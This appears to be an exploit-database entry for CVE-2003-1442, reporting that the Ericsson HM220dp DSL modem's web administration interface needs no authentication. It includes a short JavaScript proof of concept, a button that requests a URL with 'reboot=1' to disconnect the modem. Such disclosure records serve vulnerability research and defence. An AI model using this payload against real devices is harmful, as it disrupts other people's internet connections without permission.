EXPLOITS

Ericsson HM220dp DSL Modem - World Accessible Web Administration Interface

Author: Davide Del Vecchio
type: remote
platform: hardware
port: 
date_added: 2003-02-11  
date_updated: 2012-10-25  
verified: 1  
codes: CVE-2003-1442;OSVDB-59601  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22244.txt  

source: https://www.securityfocus.com/bid/6824/info

The Ericsson HM220dp DSL Modem uses a web interface for remote administration and configuration. This interface does not require any authentication in order to access. There is no option to enable any authentication requirement.

[script]
function exploit(){
window.location = "view-source:http://www.example.com/dummy.html?reboot=1";
}
[/script]
[input type="button" value="disconnect" onClick="exploit();"]